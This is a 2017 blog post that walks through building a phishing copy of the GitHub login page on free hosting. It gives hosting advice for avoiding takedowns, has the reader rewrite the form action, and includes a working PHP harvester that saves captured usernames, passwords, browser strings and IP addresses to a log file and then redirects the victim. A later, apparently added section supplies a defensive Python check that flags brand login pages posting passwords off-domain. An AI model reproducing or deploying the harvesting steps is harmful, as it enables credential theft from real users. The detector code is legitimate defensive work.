Sunday, March 19, 2017

Phishing Attacks

How Do Phishing Websites Reach You?

Opening a phishing email
Clicking a suspicious ad
Accessing a fake login page
Engaging in social media
etc.
Now let's see how to create one.

This was done for learning purposes only, and the intention was not to harm any commercial websites.

Hey folks! I recently tried many free hosting services such as www.5gbfree.com, www.freehosting.com, www.byet.host and x10hosting.com (not available for our region, but usable by connecting to a VPN).

All of these free hosting providers were able to detect the phishing activity: they removed the harmful content and even suspended the account.


Because of that, I tried to host it on one of my own dedicated servers. Guess what happened: the domain got suspended for several weeks.



So if you are trying to create a phishing site or are tired of free hosting services, from my own personal experience I advise you not to host it on your personal servers.

Let's get started.

What is Phishing?

"Phishing is a sort of fraud in which the attacker tries to learn information such as login credentials or account information by pretending to be a reputable entity or person in email or other communication channels."

Here is the phishing site that I created   ----------->    www.github.com

1. Choose an appropriate hosting provider.

           * For this phishing activity I used www.000webhost.com

2. After creating a hosting account, create an index.html file in the public folder and copy the page source that you need for the phishing activity.



3. Paste the page source into the index file.


Now our phishing site looks exactly the same as the original GitHub login page, but it has a different URL from the original web page.



4. Go to edit mode and modify the content.
          * Find the keyword called "action"



5. Change the link address to post.php



6. Save the changes, create a post.php script in the same path, and try the following code.

<?php
//writing the credentials to variables 
$un = $_POST["username"];
$pass = $_POST["password"];
$browser = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER[REMOTE_ADDR];
$line = date('Y-m-d');
//opening the text file and writing the credentials
$datafile= fopen("log.txt","a") or die("Error");
$txt = "\n \n USERNAME = $un\n PASSWORD = $pass\n Web Browser = $browser\n IP Address = $ip\n Date = $line\n";
fwrite($datafile,"\n". $txt);
fclose($datafile);
//redirecting to home page 
header("Location: https://github.com");
exit();
?>
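
A defender's check for the clone described in steps 2 to 5, as an added example that is not part of the original post: it flags a page whose title carries a brand name while the page itself, or the target of its password form, sits on a host outside the brand's domain. The sample HTML, the host login-portal.example and all function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
# Constructed sample: a copied login page whose form action was changed to post.php.
CLONE = """<html><head><title>Sign in to GitHub</title></head><body>
<form action="post.php" method="post"><input type="text" name="username">
<input type="password" name="password"></form></body></html>"""

class LoginForms(HTMLParser):
    """Records the page title and the action of every form with a password field."""
    def __init__(self):
        super().__init__()
        self.title, self.actions = "", []
        self._in_title, self._action, self._has_pw = False, None, False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self._action, self._has_pw = a.get("action") or "", False
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self._has_pw = True
    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "form" and self._action is not None:
            if self._has_pw:
                self.actions.append(self._action)
            self._action = None
    def handle_data(self, data):
        if self._in_title:
            self.title += data

def host_matches(host, brand_domain):  # exact domain or one of its subdomains
    host = (host or "").lower()
    return host == brand_domain or host.endswith("." + brand_domain)

def check_login_page(page_url, html, brand_name, brand_domain):
    """Findings for a page that shows brand_name but is not tied to brand_domain."""
    p = LoginForms()
    p.feed(html)
    findings = []
    claims_brand = brand_name.lower() in p.title.lower()
    if claims_brand and not host_matches(urlparse(page_url).hostname, brand_domain):
        findings.append("brand in title but page host is not " + brand_domain)
    for action in p.actions:
        target = urlparse(urljoin(page_url, action)).hostname
        if claims_brand and not host_matches(target, brand_domain):
            findings.append(f"password form posts to {target}")
    return findings
```

The suffix match in host_matches is deliberate: a lookalike host that merely begins with the brand's domain name does not pass, because only the exact domain or a true subdomain counts.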




That's all about phishing. Let's give it a try and see.


